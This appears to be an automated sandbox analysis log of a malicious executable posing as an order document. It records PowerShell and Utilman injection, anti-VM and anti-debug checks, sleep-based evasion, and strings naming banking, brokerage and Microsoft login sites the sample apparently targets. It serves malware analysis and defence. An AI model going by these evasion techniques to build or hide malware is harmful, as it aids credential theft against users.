                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: ORDER REF 47896798 PSMCO.exe PID: 3568, type: MEMORYSTR
                      Switches to a custom stack to bypass stack traces
                      Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
                      Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
                      Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
                      Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                      Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                      Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                      Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                      Source: C:\Windows\SysWOW64\Utilman.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeMemory allocated: 30F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeMemory allocated: 1660000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeMemory allocated: 9220000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeMemory allocated: A220000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeMemory allocated: A420000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeMemory allocated: B420000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0194096E rdtsc 5_2_0194096E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3917Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 924Jump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeWindow / User API: threadDelayed 9838Jump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\Utilman.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exe TID: 3492Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 424Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exe TID: 6244Thread sleep count: 135 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exe TID: 6244Thread sleep time: -270000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exe TID: 6244Thread sleep count: 9838 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exe TID: 6244Thread sleep time: -19676000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe TID: 988Thread sleep time: -95000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe TID: 988Thread sleep time: -43500s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe TID: 988Thread sleep count: 49 > 30Jump to behavior
                      Source: C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe TID: 988Thread sleep time: -49000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\Utilman.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\Utilman.exeCode function: 7_2_0321C830 FindFirstFileW,FindNextFileW,FindClose,7_2_0321C830
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: D7825j9.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: D7825j9.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: D7825j9.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: D7825j9.7.drBinary or memory string: discord.comVMware20,11696487552f
                      Source: D7825j9.7.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2127385175.00000000061D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l.
                      Source: D7825j9.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: D7825j9.7.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: D7825j9.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: D7825j9.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: D7825j9.7.drBinary or memory string: global block list test formVMware20,11696487552
                      Source: D7825j9.7.drBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: D7825j9.7.drBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: D7825j9.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: Utilman.exe, 00000007.00000002.4553324298.000000000333E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: D7825j9.7.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: D7825j9.7.drBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: oDhSPGbJgMIIvl.exe, 00000009.00000002.4558634174.0000000000D40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                      Source: firefox.exe, 0000000C.00000002.2596067806.00000260C7F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                      Source: D7825j9.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: D7825j9.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: ORDER REF 47896798 PSMCO.exe, 00000000.00000002.2127385175.00000000061D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: D7825j9.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: D7825j9.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: D7825j9.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: D7825j9.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: D7825j9.7.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: D7825j9.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: D7825j9.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: D7825j9.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: D7825j9.7.drBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: D7825j9.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: D7825j9.7.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: D7825j9.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: D7825j9.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: D7825j9.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\Utilman.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0194096E rdtsc 5_2_0194096E
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_00417D93 LdrLoadDll,5_2_00417D93
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198019F mov eax, dword ptr fs:[00000030h]5_2_0198019F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198019F mov eax, dword ptr fs:[00000030h]5_2_0198019F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198019F mov eax, dword ptr fs:[00000030h]5_2_0198019F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0198019F mov eax, dword ptr fs:[00000030h]5_2_0198019F
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_01940185 mov eax, dword ptr fs:[00000030h]5_2_01940185
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BC188 mov eax, dword ptr fs:[00000030h]5_2_019BC188
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019BC188 mov eax, dword ptr fs:[00000030h]5_2_019BC188
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FA197 mov eax, dword ptr fs:[00000030h]5_2_018FA197
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FA197 mov eax, dword ptr fs:[00000030h]5_2_018FA197
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_018FA197 mov eax, dword ptr fs:[00000030h]5_2_018FA197
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A4180 mov eax, dword ptr fs:[00000030h]5_2_019A4180
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_019A4180 mov eax, dword ptr fs:[00000030h]5_2_019A4180
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E1D0 mov eax, dword ptr fs:[00000030h]5_2_0197E1D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E1D0 mov eax, dword ptr fs:[00000030h]5_2_0197E1D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0197E1D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E1D0 mov eax, dword ptr fs:[00000030h]5_2_0197E1D0
                      Source: C:\Users\user\Desktop\ORDER REF 47896798 PSMCO.exeCode function: 5_2_0197E1D0 mov eax, dword ptr fs:[00000030h]5_2_0197E1D0
